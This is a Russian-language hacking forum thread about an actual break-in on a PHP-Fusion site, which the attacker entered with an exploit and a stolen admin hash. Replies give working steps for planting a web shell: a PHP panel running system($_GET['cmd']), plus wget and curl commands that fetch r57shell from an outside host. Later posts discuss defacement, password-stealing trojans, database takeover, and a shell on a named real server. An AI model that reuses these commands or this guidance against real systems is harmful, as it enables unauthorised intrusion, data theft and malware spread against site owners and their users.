Сплойтом получил хеш админа, подставил в куки и имею полный доступ в php-fusion. Подскажите как теперь можно залить скрипт пхп тот же "remview"?
рарзеши в админке приатачивать файлы и добавь расширение .php потом создавай пост, атач шелл и жми на него =)
Директория, хранящая CGI приложение, доступна на запись другим пользователям. Права на директорию должны быть 0755 или 0711 English description directory is writable by others: (/home/l/XXXXXXX.hut1.ru/WWW/forum/attachments)
Тогда иди в управление панелями - создать новую, содержание типа PHP: system($_GET['cmd']); включи и ок =)
Использовал: system('wget -o /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt'); А что это значит, вместо скрипта (http://xxxxx.hut1.ru/forum/1.php) эта муть получилась: --18:10:05-- http://rst.void.ru:80/download/r57shell.txt => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 2) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 3) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 4) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 5) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 6) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 7) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 8) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try: 9) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:10) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:11) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:12) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:13) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:14) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:15) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:16) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:17) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:18) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:19) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. --18:10:05-- http://rst.void.ru:80/download/r57shell.txt (try:20) => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Giving up.
Попробуй другие качалки кроме wget. Например curl. curl --output /home/l/xxxxx.hut1.ru/WWW/forum/1.php http://rst.void.ru/download/r57shell.txt
А что дальше? Нет там других закачек. Я просто с аттачмента перенес шелл в нужну с правами папку. Теперь встал второй вопрос - А ЧТО ДАЛЬШЕ ? Всё грохать или дефейсить безпонту. Что бы Вы посоветовали теперь толкового придумать что бы хоть что-то поиметь с этого? Я уж и не знаю, может скрипт или какого трояна под видом нужной проги выложить что бы пароли с инета какие есть потырить или ещё чего. Подло конечно это, но ради учебы и познаний на практике, компьютерный Бог возможно и простит за это Где можно найти исходники желательно на дельфях троянов и прочей гадости?
Дружище дефейсить ненадо.Лучше sql клиент там заливай и входи в базу.Поучи що там и как там.Попробуй себе админом сделать через базу.Вот такие веще учи,а не сразу дефейсить.Ето будет самое тупое что можеш сделать.Успехов тебе.
Вот только чё не понятно, ты говоришь, что ты админ, а судя вот по этому --18:10:05-- http://rst.void.ru:80/download/r57shell.txt => `r57shell.txt' Connecting to rst.void.ru:80... connect: Permission denied Retrying. мне кажется, что отказано в доступе...
не-не, админ точно, просто wget не даёт. я взял просто шелл аттач загнал а потом перенес в нужную папку. Мужики, теперь второй вопрос - А ЧТО ДАЛЬШЕ? расскажите плиз, что вообще делается что бы что-то поиметь
есть php shell на: Linux server.office.etersoft.ru 2.6.16-std26-up-alt6 #1 Fri May 26 19:57:37 MSD 2006 i686 GNU/Linux Linux 2.6.16-std26-up-alt6 linux-gnu Apache/1.3.34 (ALT Linux/alt4) mod_ssl/2.8.25 OpenSSL/0.9.7g PHP/4.4.2RC2-dev/ALT with Hardening-Patch mod_fastcgi/2.2.1 uid=96(apache) gid=96(apache) groups=62(webmaster),96(apache),500(builder) /var/www/sites/eterhost/empl/argentum/( drwxrwsr-x ) что можно придумать?
на этом компе хостится и сайт с бажным форумом. Я просто не пишу, потому что все ломанут А это я как понял у них главный проект
